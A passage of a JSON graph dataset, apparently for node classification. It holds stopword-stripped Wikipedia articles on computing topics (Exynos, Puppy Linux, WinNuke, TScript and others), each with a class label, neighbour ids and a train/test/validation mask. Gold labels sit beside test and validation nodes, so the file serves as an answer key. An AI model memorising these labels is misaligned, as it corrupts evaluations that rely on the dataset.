legends however light gun support unavailable february 4 2008 nes version operation wolf released north american wii virtual console whereas nes version allowed nes zapper support vc re-release feature kind light gun support including wii remote pointer functions making game playable standard controller mode game commercially successful coinslot dedicated arcade game chart number four behind street fighter continental circus wec le mans spectrum sales charts number two behind robocop number one every month year game also critically acclaimed several awards 1989 golden joystick awards 1988 including overall game year 8-bit well best coin-op conversion 8-bit best coin-op conversion 16-bit sinclair user gave top game 1988 award shooting game likely push edge 1988 later voted number 26 sinclair readers top 100 games time poll",
    "neighbors": [
      8709,
      8199,
      11015,
      6797,
      3348,
      5400,
      5275,
      1693,
      4894,
      9501,
      11690,
      8492,
      9006,
      5820,
      4422,
      4043,
      10316,
      9166,
      4690,
      9303,
      7269,
      8300,
      2159,
      1776
    ],
    "mask": "None"
  },
  {
    "node_id": 6391,
    "label": 3,
    "text": "Exynos:exynos exynos greek words exypnos meaning smart prasinos meaning green series arm-based reduced instruction set system-on-chips socs developed manufactured samsung electronics continuation samsung earlier s3c s5l s5p line socs 2010 samsung launched hummingbird s5pc110 exynos 3 single samsung galaxy smartphone featured licensed arm cortex-a8 cpu arm cortex-a8 code-named hummingbird developed partnership intrinsity using fastcore fast14 technology early 2011 samsung first launched exynos 4210 soc samsung galaxy ii mobile smartphone driver code exynos 4210 made available linux kernel support added version 3.2 november 2011 29 september 2011 samsung introduced exynos 4212 successor 4210 features higher clock frequency 50 percent higher 3d graphics performance previous processor generation built 32 nm high-κ metal gate hkmg low-power process promises 30 percent lower power-level previous process generation 30 november 2011 samsung released information upcoming soc dual-core arm cortex-a15 cpu initially named exynos 5250 later renamed exynos 5 dual soc memory interface providing 12.8 gb/s memory bandwidth support usb 3.0 sata 3 decode full 1080p video 60 fps along simultaneously displaying wqxga-resolution 2560 × 1600 mobile display well 1080p hdmi samsung exynos 5 dual used 2015 prototype supercomputer end-product use chip meant servers another vendor 26 april 2012 samsung released exynos 4 quad powers samsung galaxy iii samsung galaxy note ii exynos 4 quad soc uses 20 less power soc samsung galaxy ii samsung also changed name several socs exynos 3110 exynos 3 single exynos 4210 4212 exynos 4 dual 45 nm exynos 4 dual 32 nm exynos 5250 exynos 5 dual 2010 samsung founded design center austin called samsung ’ austin r center sarc samsung hired many ex-amd ex-intel ex-arm various industry veterans sarc develop high-performance low-power complex cpu system ip coherent interconnect memory controller architectures designs 2017 san jose advanced computing lab acl opened continue development mediatek unreleased custom gpu microarchitecture acquired 3 year design cycle sarc first custom core released exynos 8890 2016 exynos modem 303 exynos modem 333 exynos modem 5100 exynos t200 exynos s111 exynos auto v9",
    "neighbors": [
      11282,
      9235,
      11289,
      11294,
      1057,
      38,
      8231,
      4139,
      8237,
      9774,
      2097,
      8250,
      1083,
      8253,
      7745,
      7747,
      69,
      2635,
      99,
      8812,
      10361,
      6266,
      6268,
      638,
      644,
      9863,
      8842,
      146,
      659,
      2707,
      9368,
      7833,
      666,
      5786,
      7835,
      10393,
      4258,
      4773,
      9913,
      8383,
      10945,
      196,
      4821,
      2788,
      3301,
      9964,
      1776,
      9970,
      6391,
      3835,
      2814,
      781,
      2838,
      2852,
      5417,
      810,
      2862,
      7983,
      7988,
      11062,
      6971,
      6978,
      8003,
      10562,
      6981,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      10080,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      4508,
      5028,
      7077,
      9638,
      10675,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 6392,
    "label": 4,
    "text": "Control_reconfiguration:control reconfiguration control reconfiguration active approach control theory achieve fault-tolerant control dynamic systems used severe faults actuator sensor outages cause break-up control loop must restructured prevent failure system level addition loop restructuring controller parameters must adjusted accommodate changed plant dynamics control reconfiguration building block toward increasing dependability systems feedback control figure right shows plant controlled controller standard control loop nominal linear model plant formula_1 plant subject fault indicated red arrow figure modelled general formula_2 subscript formula_3 indicates system faulty approach models multiplicative faults modified system matrices specifically actuator faults represented new input matrix formula_4 sensor faults represented output map formula_5 internal plant faults represented system matrix formula_6 upper part figure shows supervisory loop consisting fault detection isolation fdi reconfiguration changes loop end vectors inputs outputs contain available signals used controller fault-free operation alternative scenarios model faults additive external signal formula_9 influencing state derivatives outputs follows formula_10 goal reconfiguration keep reconfigured control-loop performance sufficient preventing plant shutdown following goals distinguished internal stability reconfigured closed loop usually minimum requirement equilibrium recovery goal also referred weak goal refers steady-state output equilibrium reconfigured loop reaches given constant input equilibrium must equal nominal equilibrium input time tends infinity goal ensures steady-state reference tracking reconfiguration output trajectory recovery goal also referred strong goal even stricter requires dynamic response input must equal nominal response times restrictions imposed state trajectory recovery goal requires state trajectory restored nominal case reconfiguration input usually combination goals pursued practice equilibrium-recovery goal stability question whether similar goals reached specific faults addressed reconfigurability analysis paradigm aims keeping nominal controller loop end reconfiguration block placed faulty plant nominal controller together faulty plant forms reconfigured plant reconfiguration block fulfill requirement behaviour reconfigured plant matches behaviour nominal fault-free plant linear model following formal feature nominal closed loop attempted recovered classical pseudo-inverse method closed loop system matrix formula_11 state-feedback control structure used new controller formula_12 found approximate formula_13 sense induced matrix norm perfect model following dynamic compensator introduced allow exact recovery complete loop behaviour certain conditions eigenstructure assignment nominal closed loop eigenvalues eigenvectors eigenstructure recovered nominal case fault optimisation control schemes include linear-quadratic regulator design lqr model predictive control mpc eigenstructure assignment methods probabilistic approaches developed learning automata neural networks etc methods reconfiguration achieved differ considerably following list gives overview mathematical approaches commonly used prior control reconfiguration must least determined whether fault occurred fault detection components affected fault isolation preferably model faulty plant provided fault identification questions addressed fault diagnosis methods fault accommodation another common approach achieve fault tolerance contrast control reconfiguration accommodation limited internal controller changes sets signals manipulated measured controller fixed means loop restructured",
    "neighbors": [
      11533,
      9677
    ],
    "mask": "Test"
  },
  {
    "node_id": 6393,
    "label": 2,
    "text": "Puppy_Linux:puppy linux puppy linux operating system family light-weight linux distributions focus ease use minimal memory footprint entire system run random-access memory current versions generally taking 210 mb allowing boot medium removed operating system started applications abiword gnumeric mplayer included along choice lightweight web browsers utility downloading packages distribution originally developed barry kauler members community kauler retired 2013 tool woof build puppy linux distribution binary packages linux distributions barry kauler started puppy linux response trend distributions becoming stricter system requirements time distribution emphasis speed efficiency lightweight started boot disk howto gradually included components file-by-file puppy linux completed puppy linux started vector linux based became fully independent distribution puppy 0 initial release puppy linux unionfs extreme minimal persistence support package manager ability install applications puppy 1 series run comfortably dated hardware pentium computer least 32 mb ram newer systems usb keydrive version might better although usb device booting directly supported bios puppy floppy boot disk used kick-start possible run puppy linux windows 9x/windows also possible bios support booting usb drive boot cd keep user state usb keydrive saved shutdown read usb device bootup puppy 2 uses mozilla-based seamonkey internet suite primarily web browser e-mail client puppy 3 features slackware 12 compatibility accomplished inclusion almost dependencies needed installation slackware packages however puppy linux slackware-based distribution puppy 4 built scratch using t2 sde longer features native slackware 12 compatibility order reduce size include newer package versions found 3 compensate optional compatibility collection packages created restores lost compatibility puppy 4.2 features changes user interface backend upgraded packages language character support new in-house software optimizations still keeping iso image size 100 mb puppy 5 based project called woof designed assemble puppy linux distribution packages linux distributions woof includes binaries software derived ubuntu debian slackware t2 sde arch repositories puppy 5 came stripped version midori browser used reading help files choice web browsers installed including chromium firefox seamonkey internet suite iron opera puppy 6 built ubuntu 14.04 trusty tahr packages binary compatibility ubuntu 14.04 access ubuntu package repositories tahrpup built woof-ce build system forked barry kauler woof late last year announced retirement puppy development built latest testing branch incorporates latest woof-ce features released pae nopae isos option switch kernels puppy 7 built ubuntu 16.04 xenial xerus packages binary compatibility ubuntu 16.04 access ubuntu package repositories tahrpup built woof-ce build system forked barry kauler woof built latest testing branch incorporates latest woof-ce features released pae nopae isos option switch kernels new ui new kernel update greater hardware compatibility redesign puppy package manager bugfixes base packages inclusion woof structure puppy 8 built ubuntu bionic beaver 18.04.2 packages binary compatibility ubuntu 18.04.2 access ubuntu package repositories bionicpup built woof-ce build system forked barry kauler woof built latest testing branch incorporates latest woof-ce features puppy linux complete operating system bundled collection applications suited general use tasks used rescue disk demonstration system leaves previous installation unaltered accommodation system blank missing hard drive using modern software legacy computers puppy compact size allows boot media computer support function live usb flash devices usb mediums cd internal hard disk drive sd card zip drive ls-120/240 superdisk pxe floppy boot disk chainloads data storage media also ported arm run single board computer raspberry pi puppy linux features built-in tools used create bootable usb drives create new puppy cds remaster new live cd different packages also uses sophisticated write-caching system purpose extending life live usb flash drives puppy linux includes ability use normal persistent updating environment write-once multisession cd/dvd require rewritable disc unique feature sets apart linux distributions distributions offer live cd versions operating systems none offer similar feature puppy bootloader mount hard drives connect network automatically ensures bug even unknowingly incompatible software wo n't corrupt contents devices puppy linux offers session save shutdown since puppy linux fundamentally runs ram files configurations made changed session would disappear otherwise feature enables user either save contents writable storage medium write file system cd containing puppy multisession used create booted cd disc drive supports burning applies cd-rs well cd-rws dvds also possible save files external hard drive usb stick even floppy disk instead root file system puppy also installed hard disk default window manager puppy releases jwm packages icewm desktop fluxbox enlightenment also available via puppy petget package application management system see derivative distributions called puplets come default window managers jwm operating system boots everything puppy package uncompresses ram area ramdisk pc needs least 128 mb ram 8 mb shared video puppy load ramdisk however possible run pc 48 mb ram part system kept hard drive less effectively left cd puppy fairly full-featured system runs entirely ramdisk booted live system 'frugal installation however puppy also supports 'full installation mode enables puppy run hard drive partition without ramdisk applications chosen met various constraints size particular one aims distribution extremely easy set many wizards guide user wide variety common tasks puppy linux package manager puppy package manager installs packages pet puppy enhanced tarball format default also accepts packages distros .deb .rpm .txz .tgz packages using third-party tools convert packages distros pet packages puppy package manager also trim software bloat package reduce disk space used earlier releases puppy linux puppy unleashed used create puppy iso images consists 500 packages put together according user needs however later versions starting puppy linux version 5.0 replaced woof advanced tool creating puppy installations requires internet connection knowledge linux use able download binary source packages another linux distribution process puppy linux packages defining name linux distro equipped simpler version control named bones earlier releases later versions woof fossil version control used puppy also comes remastering tool takes snapshot current system lets user create live cd additional remastering tool able remove installed components puppy linux uses t2 sde build scripts build base binary packages relative ease woof tool remaster tool used build variants puppy linux many variants available variants puppy linux known puplets barry kauler reduced involvement puppy project designed two new distributions within puppy linux family quirky wary quirky – embedded less-stable distro files contained initramfs built kernel simple module loading management fewer drivers included used experimental purposes racy – variant puppy optimized newer pcs wary – puppy variant targeted users old hardware uses older linux kernel long-term support newest applications easy – puppy variant init script completely rewritten uses originally developed application containers aside conventional package management distrowatch reviewer rober storey concluded puppy 5.2.5 april 2011 lot people like puppy — top 10 distrowatch page-hit ranking enjoy puppy run exclusively netbook maybe thing wrong puppy users expectations tend exceed developer intentions detailed review puppy linux may 2011 howard fosdick os news addressed root user issue theory could problem — practice presents downside 've never heard single puppy user suffering problem due fosdick concluded like puppy lightest linux distro 've found still suitable end users install old p-iii p-iv computer family friends use effectively common tasks expensive new machine december 2011 jesse smith writing distrowatch reviewed puppy 5.3.0 slacko puppy praised simplicity flexibility clear explanations noting limitations running root concluded would also like see option added boot process would give user choice running unprivileged mode opposed running root always administrator advantages convenience means user always one careless click away deleting files one exploit away compromised operating system live cd hard beat puppy linux performance functional software minimal hardware requirements flexible great distro long n't push far niche december 2011 howard fosdick reviewed versions puppy linux available concluded puppy diversity flexibility make great community-driven system computer enthusiasts hobbyists tinkerers also make somewhat disorderly world might read bit figure puppy release puplet puppy online documentation extensive confusing always clear docs pertain releases users rely active friendly forum support also noted us enjoy computers sometimes forget many view disdain wrong buy new one every four years earth change interface every release ca n't work puppy great solution folks up-to-date free easy use supports free applications ubuntu slackware puppy repositories user-friendly",
    "neighbors": [
      4611,
      3079,
      10760,
      7689,
      7181,
      6158,
      3089,
      4113,
      8209,
      8213,
      8214,
      8727,
      6680,
      4637,
      543,
      11297,
      7204,
      9253,
      5670,
      11305,
      56,
      4153,
      3129,
      59,
      3131,
      8248,
      9276,
      3649,
      4673,
      10817,
      3654,
      5190,
      3147,
      5707,
      2125,
      1107,
      3667,
      6227,
      1110,
      6231,
      89,
      5721,
      4192,
      3685,
      9324,
      10860,
      5742,
      2671,
      1138,
      11388,
      7293,
      1150,
      2692,
      8837,
      9353,
      9873,
      11410,
      10900,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      4775,
      10920,
      9899,
      6828,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      5819,
      190,
      2239,
      9407,
      708,
      2763,
      8907,
      3791,
      6352,
      6361,
      7385,
      11481,
      6371,
      741,
      231,
      4841,
      6890,
      7913,
      5356,
      6380,
      9964,
      7920,
      3314,
      5363,
      6898,
      9461,
      1782,
      5369,
      8957,
      7938,
      4355,
      11525,
      2310,
      7431,
      7435,
      7947,
      9487,
      2321,
      3859,
      788,
      1813,
      5397,
      4887,
      6934,
      8476,
      8992,
      10530,
      6436,
      2853,
      3369,
      6446,
      7983,
      1842,
      823,
      2872,
      1849,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      3918,
      2383,
      9048,
      2401,
      2914,
      1379,
      8033,
      5990,
      9063,
      9064,
      7020,
      7534,
      10096,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      8584,
      2955,
      10127,
      912,
      2448,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      3496,
      7082,
      1455,
      948,
      439,
      6583,
      10172,
      10694,
      4039,
      9671,
      5067,
      463,
      975,
      4561,
      9689,
      2010,
      9693,
      7140,
      485,
      8676,
      6119,
      5096,
      1515,
      495,
      8177,
      1522,
      499,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 6394,
    "label": 4,
    "text": "PUSH_and_ACK_floods:push ack floods push floods ack floods denial service attacks based psh ack flags since flags require additional processing may possible overwhelm service setting flags numerous requests proxy filters may drop appropriate packets flags set system considered attack",
    "neighbors": [
      2299,
      10924
    ],
    "mask": "None"
  },
  {
    "node_id": 6395,
    "label": 1,
    "text": "Hierarchical_database_model:hierarchical database model hierarchical database model data model data organized tree-like structure data stored records connected one another links record collection fields field containing one value type record defines fields record contains hierarchical database model mandates child record one parent whereas parent record one child records order retrieve data hierarchical database whole tree needs traversed starting root node model recognized first database model created ibm 1960s hierarchical structure developed ibm 1960s used early mainframe dbms records relationships form treelike model structure simple inflexible relationship confined one-to-many relationship ibm information management system ims rdm mobile examples hierarchical database system multiple hierarchies data rdm mobile newly designed embedded database mobile computer system hierarchical data model lost traction codd relational model became de facto standard used virtually mainstream database management systems relational-database implementation hierarchical model first discussed published form 1992 see also nested set model hierarchical data organization schemes resurfaced advent xml late 1990s see also xml database hierarchical structure used primarily today storing geographic information file systems currently hierarchical databases still widely used especially applications require high performance availability banking telecommunications one widely used commercial hierarchical databases ims another example use hierarchical databases windows registry microsoft windows operating systems organization could store employee information table contains attributes/columns employee number first name last name department number organization provides employee computer hardware needed computer equipment may used employee assigned organization could store computer hardware information separate table includes part serial number type employee uses tables might look like model codice_1 data table represents parent part hierarchy codice_2 table represents child part hierarchy contrast tree structures usually found computer software algorithms model children point parents shown employee may possess several pieces computer equipment individual piece computer equipment may one employee owner consider following structure child type parent hierarchy stating empno 10 boss 20 30 40 report 20 represented reportsto column relational database terms reportsto column foreign key referencing empno column child data type different would different table would still foreign key referencing empno column employees table simple model commonly known adjacency list model introduced dr. edgar f. codd initial criticisms surfaced relational model could model hierarchical data however model special case general adjacency list graph",
    "neighbors": [
      2688,
      5632,
      10632,
      8201,
      6797,
      11024,
      9631,
      1697,
      7076,
      6831,
      9397,
      4155,
      7868,
      9147,
      11324,
      2369,
      11457,
      6085,
      9286,
      974,
      2512,
      2901,
      7767,
      11098,
      479,
      7650,
      8291,
      9828,
      10471,
      7537,
      1146,
      6651,
      3196
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6396,
    "label": 4,
    "text": "WBAdmin:wbadmin computing codice_1 command-line utility built windows vista windows server 2008 windows 7 windows server 2008 r2 windows 8 windows server 2012 windows 10 operating systems command used perform backups restores operating systems drive volumes computer files folders applications command-line interface codice_1 disk-based backup system create bare metal backup used restore windows operating system similar dissimilar hardware backup file created primarily form microsoft virtual hard disk .vhd files accompanying .xml configuration files backup .vhd file mounted windows disk manager view content however .vhd backup file direct disk clone utility replaces previous microsoft windows backup command-line tool ntbackup came built-into windows nt 4.0 windows 2000 windows xp windows server 2003 command-line version backup restore codice_1 also graphical user interface gui option available simplify creation computer backup restore workstation editions windows 7 use backup wizard located control panel server version done easily installed windows feature using windows management console wbadmin.msc wbadmin management console simplifies restoration whether single file multiple folders using command-line graphical user interface codice_1 creates backup quickly restored using windows media install dvd backup files located removable usb disk without need re-install scratch codice_1 uses differencing engine update backup files original backup file created volume shadow copy service updates changes subsequent full backups take matter moments rather many minutes taken create original backup file automatic backups scheduled regular basis using wizard two kinds restore operations supported",
    "neighbors": [
      2432,
      3970,
      8834,
      10631,
      2568,
      6281,
      6797,
      3856,
      6674,
      4248,
      8729,
      4001,
      9505,
      4771,
      7847,
      808,
      7983,
      7088,
      10033,
      3250,
      5300,
      9780,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      9025,
      8517,
      7244,
      1741,
      4174,
      1750,
      9946,
      7905,
      10727,
      4074,
      6506,
      9709,
      1647,
      9839,
      2545,
      4850,
      7411,
      8692,
      11249
    ],
    "mask": "Test"
  },
  {
    "node_id": 6397,
    "label": 2,
    "text": "Stuart_Langridge:stuart langridge stuart langridge also known 'aq 'zippy podcaster developer author member web standards project dom scripting task force invited expert w3c html working group acknowledged commentator dom scripting javascript techniques langridge best known presenter defunct lugradio free software podcast uk along jono bacon longest-serving member team often served incite discussion issues directly related software freedom lugradio frequently advocated freedom yet despite often attracted criticism using proprietary software langridge involved shot jaq podcast collaboration former lugradio co-host jono bacon part bad voltage podcast together jono bacon jeremy garcia founder linuxquestions.org bryan lunduke founder jupiter broadcasting also founder member bad voltage podcast since moved due commitments podcast first aired october 2013 current projects include jokosher multi-track audio editor gnome jackfield program run mac os x dashboard widgets gnome january 2009 langridge joined canonical developer left company 2013 work freelancer kryogenix consulting canonical worked desktop couch ubuntu role canonical ltd. staffer langridge written two books technical publisher sitepoint dhtml utopia run web server using linux apache tony steidler-dennison well writing stylish scripting weblog 2005",
    "neighbors": [
      9561,
      5755,
      1396
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6398,
    "label": 9,
    "text": "TScript:tscript tscript object-oriented embeddable scripting language c++ supports hierarchical transient typed variables tvariable main design criterion create scripting language interface c++ transforming data returning result enables c++ applications change functionality installation basic hello world tscript example standard variable formed fixed data boolean integer decimal variable length variable ascii string wide character string binary string type data used define variable type explicitly declared example code create variable called myinteger assign value zero integer type also declared default value set zero tvariable hierarchical nature similar xml javascript php variables tvariable type also transient integer changed astring assigning string value casting variable astring example integer variable created used reassigned equating astring tvariables also used hold array tvariables valid variable created array index subscripting notation used transform array example code create array four elements tvariable type list.type structure element integer class tscript similar array tvariable handle use strings array scriptures example code create structured variable list monday true list.tuesday false native c++ code structured tvariable elements accessible c++ either native code supporting hierarchical variables tscript able store primitive complex variables within variable structure removes requirement unique difference primitives structured data therefore making class structure logical grouping functionality rather data storage type tscript implements concepts inheritance code encapsulation defined variables example following code snippet show defined variables supports constructor another striking feature tscript function declarations use output parameters rather return values provide syntactic support standard function many procedural languages following algol form tscript pattern changed form change done two things first allows multiple output variables secondly changed return statement error handling function allowing functions list input output variables separated semi column changed normal flow function called used removes need using reference pointers return multiple variables common c/c++ use references scripting languages actually prevented forcing use structure array return multiple values second noticeable thing calling conventions functions integrated error handling purpose similar c++ java tscript since functions return error return statement operates similar throw statement example statement return error error message terminate function return error message alternatively blank statement return terminate function return error convenience tscript offers shorthand function calling situation one returned variable notation substitute case short notation prevents calling code catching errors automatically return parental calling code error handling many languages done use exceptions tscript uses similar process error handling although slightly different tscript global error variable similar traditional errno c although error variable tscript capable holding error code detailed error message many languages use syntax error returned via catch statement make operational flow code awkward situations errors recoverable tscript uses notation allows calling code filter error potentially recovering error returning normal operation returning error calling function c++ supports function overloading enables functions name differentiated input parameters causes tscript issue supporting loose type variables way tell type variable software executed counter problem tscript written run-time linking particular function called dependent type variables function called unusual tactic additional benefits first means need declare functions used example c++ two functions may call one another like situation needs prototyped order call tscript run-time linking means functions declared order without need prototype make writing code much easier less experienced programmers allowing focus logic software requirements language run-time linking also enables language support run-time coding methods like enables tscript programs write example using soap interface remote wsdl encoded script library allowing functions within called coded design time additionally also possible write code learn writing new functions needs tscript among small group scripting languages provide functionality dynamically load link existing shared libraries java jni vb6 two scripting languages enable code written would load third party library execute native interface gives tscript ability use wealth pre-existing functionality code written different languages done without need change shared library ’ interface compiled source code tscript uses standard c++ class encapsulation allocate de-allocate memory resources means allocated memory released variable containing destroyed operated differently garbage collection model java reference counting model .net languages operation system resources files sockets encryption keys managed via reference counting mechanism similar .net released soon variables containing values ability load existing shared libraries script access privileges granted user executes guard malicious code resources beyond basic memory allocation required granted script also includes ability use message boxes prompt user read and/or write access file directory using internet connection security architecture designed allow running scripts similar way javascript enabling usefulness powerful scripting languages like perl",
    "neighbors": [
      8644,
      9828,
      3462,
      847,
      7983,
      8559,
      9780,
      3573,
      10486,
      823,
      10555,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 6399,
    "label": 7,
    "text": "Chaser_(company):chaser company chaser cloud-based credit control software founded ceo david tuck former finance director wayn idio financial controller fever-tree ltd 2015 future 50 named chaser one britain disruptive businesses well awarding friend business award 2016 chaser named xero add-on partner year",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6400,
    "label": 3,
    "text": "Space_Manbow:space manbow space manbow shoot 'em video game developed published konami msx2 msx2+ home computers 1989 later re-released mobile phones september 1 2006 nintendo wii virtual console service november 24 2009 february 19 2014 wii u july 28 2015 windows store project egg never released outside japan game player pilots starship shaped like mambo fish two weapon types available throughout game powered standard pickups weapons gradually lose power unless player makes additional pickups however ship helped two stationary options similar found gradius series options able shift alternatively fire three directions forward backward towards top/bottom screen",
    "neighbors": [
      10931,
      11564
    ],
    "mask": "None"
  },
  {
    "node_id": 6401,
    "label": 2,
    "text": "ZyNOS:zynos zynos proprietary operating system used network devices made zyxel communications name contraction zyxel network operating system nos zyxel first introduced zynos 1998 zyxel released zynos version 4.0 gs2200 series 24 48 port ethernet switches april 2012 appears versions differ zyxel products web and/or command line interface cli depending device web access accomplished connecting ethernet cable pc open port device entering ip address device web browser rs-232 serial console port provided devices cli access accomplished using ssh telnet listed categories cli commands grouped web configurator divided following categories january 2014 zynos rom-0 vulnerability identified vulnerability allowed attacker download router configuration rom-0 file without type authentication required configuration file later decompressed expose router administrator password isp password wireless password etc danish computer security company secunia reports unpatched advisories vulnerabilities zynos version 4.x secunia reports seven advisories six vulnerabilities zynos version 3.x five advisories unpatched secunia rates severe unpatched advisory less critical dns vulnerability found certain zynos firmware versions versions affected narrowed attack done remote location regardless user interface accessible outside lan",
    "neighbors": [
      5472,
      8998,
      11112,
      10058,
      8432,
      3007
    ],
    "mask": "Test"
  },
  {
    "node_id": 6402,
    "label": 4,
    "text": "WinNuke:winnuke computer security winnuke example nuke remote denial-of-service attack dos affected microsoft windows 95 microsoft windows nt microsoft windows 3.1x computer operating systems exploit sent string out-of-band data oob data target computer tcp port 139 netbios causing lock display blue screen death damage change data computer hard disk unsaved data would lost so-called oob simply means malicious tcp packet contained urgent pointer urg urgent pointer rarely used field tcp header used indicate data tcp stream processed quickly recipient affected operating systems handle urgent pointer field correctly person screen-name _eci published c source code exploit may 9 1997 source code widely used distributed microsoft forced create security patches released weeks later time numerous flavors exploit appeared going names fedup gimp killme killwin knewkem liquidnuke mnuke netnuke muerte nuke nukeattack nuker102 pnewq project1 pstlince simportnuke sprite sprite32 vconnect vzmnuker wingenocide winnukeit winnuker02 winnukev95 wnuke3269 wnuke4 wnuke95 company called semisoft solutions new zealand created small program called antinuke blocks winnuke without install official patch years later second incarnation winnuke uses another similar exploit found",
    "neighbors": [
      2409,
      10924,
      6735,
      7983,
      3473,
      8976,
      2045,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6403,
    "label": 3,
    "text": "Abstraction_layer:abstraction layer computing abstraction layer abstraction level way hiding working details subsystem allowing separation concerns facilitate interoperability platform independence examples software models use layers abstraction include osi model network protocols opengl graphics libraries computer science abstraction layer generalization conceptual model algorithm away specific implementation generalizations arise broad similarities best encapsulated models express similarities present various specific implementations simplification provided good abstraction layer allows easy reuse distilling useful concept design pattern situations may accurately applied quickly recognized layer considered top another depends every layer exist without layers requires layers function frequently abstraction layers composed hierarchy abstraction levels osi model comprises seven abstraction layers layer model encapsulates addresses different part needs digital communications thereby reducing complexity associated engineering solutions famous aphorism david wheeler problems computer science solved another level indirection often deliberately misquoted abstraction substituted indirection also sometimes misattributed butler lampson kevlin henney corollary ... except problem many layers indirection computer architecture computer system usually represented consisting several abstraction levels programmable logic often considered part hardware logical definitions also sometimes seen part device software firmware firmware may include low-level software also include software including operating system applications software layers divided hardware abstraction layers physical logical device drivers repositories filesystems operating system kernels middleware applications others distinction also made low-level programming languages like vhdl machine language assembly language compiled language interpreter script language unix operating system types input output operations considered streams bytes read device written device stream bytes model used file i/o socket i/o terminal i/o order provide device independence order read write device application level program calls function open device may real device terminal virtual device network port file file system device physical characteristics mediated operating system turn presents abstract interface allows programmer read write bytes from/to device operating system performs actual transformation needed read write stream bytes device graphics libraries opengl provide abstract graphical device model interface library responsible translating commands provided programmer specific device commands needed draw graphical elements objects specific device commands plotter different device commands crt monitor graphics library hides implementation device dependent details providing abstract interface provides set primitives generally useful drawing graphical objects",
    "neighbors": [
      2948,
      6021,
      9860,
      3847,
      7175,
      521,
      9224,
      8461,
      5774,
      1297,
      5395,
      10005,
      4634,
      5531,
      3613,
      2206,
      2339,
      3491,
      2730,
      3371,
      2476,
      6061,
      2222,
      3762,
      9780,
      4919,
      9272,
      7865,
      8252,
      9921,
      11332,
      9286,
      3529,
      4042,
      9420,
      9932,
      3793,
      8401,
      10835,
      2901,
      2390,
      3413,
      9561,
      2012,
      477,
      2529,
      7139,
      10340,
      1893,
      2409,
      5612,
      9196,
      6128,
      2673,
      755,
      5363,
      5875,
      5238,
      6652,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 6404,
    "label": 3,
    "text": "B.C._II:_Grog's_Revenge:b.c ii grog revenge b.c ii grog revenge 1984 video game sierra on-line commodore 64 colecovision msx sequel b.c quest tires based b.c newspaper comic strip johnny hart player controls thor caveman rides stone unicycle thor searching meaning life within several mountains player must navigate mountains collecting clams like comic strip used money case pay toll another caveman peter access next mountain two modes play first along mountainside user move four directions must avoid falling cliff slamming wall hitting rock hole encountering creature grog yell grog knock player mountain also green dinosaur eat player tire contact player may enter caves enter second mode caves dark except beam light emanating player clams must collected without running stalagmites end mountain bridge new mountain player enough clams game continues otherwise necessary return find clams zzap 64 gave game 91 rating describing stunningly impressive programme",
    "neighbors": [
      2633,
      10931,
      6405,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6405,
    "label": 3,
    "text": "B.C.'s_Quest_for_Tires:b.c quest tires b.c quest tires home video game designed rick banks michael bate published sierra on-line 1983 versions released commodore 64 atari 8-bit family colecovision zx spectrum msx apple ii based comic strip b.c johnny hart bc quest tires scrolling game similar irem moon patrol previous year title play title contemporaneous film quest fire sequel released 1984 player takes role caveman thor rescue girlfriend cute chick kidnapped dinosaur must travel stone unicycle actually impossible wheel several levels level thor moving left right avoiding various dangers b.c quest tires action game taking place several consecutive levels levels start simple thor jump potholes duck tree branches later levels become complex example requiring thor jump turtles order cross lake carried lava pit dooky bird b.c characters fat broad also appear levels softline stated given conventional gameplay get-from-point-a-to-point-b kind game use familiar comic characters made player feel like finishing game worthwhile ... otherwise magazine concluded b.c quest tires n't much computer game interactive cartoon cartoon limits provide challenge antic approved game another 'shoot aliens save world scenario first rate animation predicted players would enjoy game day two relegate shelf compute praised game excellent graphics animation approach cartoon standards",
    "neighbors": [
      10178,
      6404,
      2633,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6406,
    "label": 3,
    "text": "Failure_detector:failure detector distributed computing system failure detector computer application subsystem responsible detection node failures crashes failure detectors first introduced 1996 chandra toueg book unreliable failure detectors reliable distributed systems book depicts failure detector tool improve consensus achievement reliability atomic broadcast sequence messages distributed system word failure detectors seek errors process system maintain level reliability practice failure detectors spot crashes system ban processes making mistakes prevent serious crashes errors 21st century failure detectors widely used distributed computing systems detect application errors software application stops functioning properly distributed computing projects see list distributed computing projects become popular usage failure detects also becomes important critical chandra toueg co-authors book unreliable failure detectors reliable distributed system 1996 approached concept detecting failure nodes introducing unreliable failure detector describe behavior unreliable failure detector distributed computing system process system entered local failure detector component local component examine portion processes within system addition process must also contain programs currently suspected failure detectors chandra toueg claimed unreliable failure detector still reliable detecting errors made system generalize unreliable failure detectors forms failure detectors unreliable failure detectors failure detectors share properties furthermore chandra toueg point important fact failure detector prevent crashes system even crashed program suspected previously construction failure detector essential difficult problem occurred development fault-tolerant component distributed computer system result failure detector invented need detecting errors massive information transaction distributed computing systems classes failure detectors distinguished two important properties completeness accuracy completeness means failure detectors would find programs finally crashed process whereas accuracy means correct decisions failure detectors made process degrees completeness depend number crashed process suspected failure detector certain period degrees accuracy depend number mistakes failure detector made certain period failure detectors categorized following eight types properties failure detectors described nutshell properties failure detectors depend fast failure detector detects actual failures well avoids false detection perfect failure detector find errors without mistakes whereas weak failure detector find errors make numerous mistakes different types failure detectors obtained changing properties failure detectors first examples show increase completeness failure detector second example shows change one type failure detector another following example abstracted department computer science yale university functions boosting completeness failure detector initially suspects ∅ forever upon receiving p process q example p crashes weak-detector eventually suspect failure detectors system eventually suspect p infinite loop created failure detectors example also shows 